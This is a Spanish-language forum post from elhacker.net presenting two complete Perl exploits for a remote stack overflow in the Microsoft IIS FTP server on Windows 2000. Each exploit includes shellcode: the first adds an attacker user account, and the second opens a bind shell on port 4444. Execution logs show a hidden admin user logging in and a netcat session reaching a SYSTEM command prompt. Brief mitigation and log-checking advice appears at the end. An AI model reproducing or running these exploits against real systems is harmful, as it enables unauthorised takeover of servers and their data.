elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Página de elhacker.net en Google+ Google+


+  Foro de elhacker.net
|-+  Seguridad Informtica
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)  (Leído 14,382 veces)
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.209



Ver Perfil
Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« en: 2 Septiembre 2009, 12:37 »

Como bien sabemos la noticia de esta nueva vulnerabilidad esta causando estragos en algunas redes, he probado en mi pequeo lab a modo Proof Of Concept, necesariamente debemos tener privilegios de escritura:

Exploit 1: Esta primera version tan solo te agrega un usuario:winown pass:nwoniw dentro de la shellcode.

Código:
#!/usr/bin/perl
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Ejecucion:
Código:
C:\>perl -x exploit1.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t20560" directory created.
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.


Despues podemos comprobar si hemos tenido exito dentro del mismo FTP

Código:
C:\>ftp 192.168.1.68
Conectado a 192.168.1.68.
220 win2k-pro Microsoft FTP Service (Version 5.0).
Usuario (192.168.1.68:(none)): winown
331 Password required for winown.
Contrasea: [b]nwoniw[/b]
230 User winown logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
w00t20560
226 Transfer complete.
ftp: 11 bytes recibidos en 0.00 segundos 3.67 a Kbytes/s.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
08-31-09  07:41PM       <DIR>          w00t20560
226 Transfer complete.
ftp: 50 bytes recibidos en 0.00 segundos 50000.00 a Kbytes/s.
ftp>

El admin notara un usuario creado con privilegios:




Exploit 2: Este segundo exploit "mejorado" se define un bind shell en el puerto 4444 dentro de la shellcode

Código:
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Ejecucion:
Código:
C:\>perl -x exploit2.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t26878" directory created.
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

C:\>nc -vvn 192.168.1.68 4444

(UNKNOWN) [192.168.1.68] 4444 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Barbaros!


Links de interes:

Exploits:
:http://www.milw0rm.com/exploits/9541
:http://www.milw0rm.com/exploits/9559

Video demo de offensive-security
:http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html

Mejores practicas para MS FTP
:http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/7b4bdad5-9a0a-4bf6-8b00-41084b783e20.mspx?mfr=true

+FIX
-Pues son pocos los factores de mitigacion, realmente es evitar escritura para los users "anonymous"
- Apagar el servicio de FTP si no es necesario
- Crearl ACLs para usuarios y directorios.



+Examinar los archivos LOGS

Generalmente en esta ruta:
Código:
c:\winnt\system32\logfiles\MSFTPSVC1

Los logs se mostrarian asi:

Código:
Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1111-01-01 22:45:13
#Fields: time c-ip cs-method cs-uri-stem sc-status
22:45:13 169.254.117.152 [1]USER anonymous 331
22:45:13 169.254.117.152 [1]PASS password 230
